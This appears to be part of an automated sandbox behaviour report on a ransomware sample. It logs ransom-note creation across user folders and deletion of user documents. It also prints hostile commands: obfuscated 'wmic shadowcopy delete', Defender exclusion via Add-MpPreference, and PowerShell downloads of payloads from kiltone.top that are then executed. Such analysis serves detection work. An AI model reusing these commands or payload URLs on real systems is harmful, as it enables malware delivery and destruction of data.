Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete

May encrypt documents and pictures (Ransomware)

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\local\temp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\aixacvybsb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\dtbzgiooso\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\kzwfnrxyki\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\nebfqqywps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\onbqclyspu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\rayhiwgkdi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\tqdgenuhwp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\uoojjozirh\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\vlzdgukutz\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\wkxewiotxi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\wutjscbcfx\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\desktop\zsszyefymu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\aixacvybsb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\dtbzgiooso\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\kzwfnrxyki\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\nebfqqywps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\nhpkizuusg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\onbqclyspu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\rayhiwgkdi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\tqdgenuhwp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\uoojjozirh\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\vlzdgukutz\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\wkxewiotxi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\wutjscbcfx\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\pictures\camera roll\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\pictures\saved pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\public\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\.ms-ad\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\3d objects\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\collab\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\forms\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\jscache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\crlcache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\acrobat\preflight acrobat continuous\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\crlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\crlogs\crashlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\flash player\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\headlights\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\linguistics\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\logtransport2\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\logtransport2cc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\rttransfer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\sonar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\adobe\sonar\sonarcc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\com.adobe.dunamis\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\addins\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\credentials\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\crypto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\crypto\keys\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\excel\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\excel\xlstart\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\low\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\network\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\network\connections\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\protect\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\speech\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\spelling\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\vault\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdesusertions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdesusertions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\chrome apps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\templates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\themes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\microsoft\windows\themes\cachedfiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\extensions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\pending pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\bookmarkbackups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\crashes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\crashes\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\archived\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\db\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\tmp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\minidumps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\saved-telemetry-pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\security_state\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\sessionstore-backups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\default\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595amcateirvtisty.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\temporary\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\to-be-removed\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\ca4gppea.default\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\contacts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\cookies\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\favorites\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\favorites\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\onedrive\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\saved games\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: c:\users\user\searches\decryptfiles.txt

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File moved: C:\Users\user\Desktop\AIXACVYBSB.docx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File deleted: C:\Users\user\Desktop\AIXACVYBSB.docx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File moved: C:\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File deleted: C:\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File moved: C:\Users\user\Desktop\TQDGENUHWP\XZXHAVGRAG.mp3

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\fjeljies.cpl			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
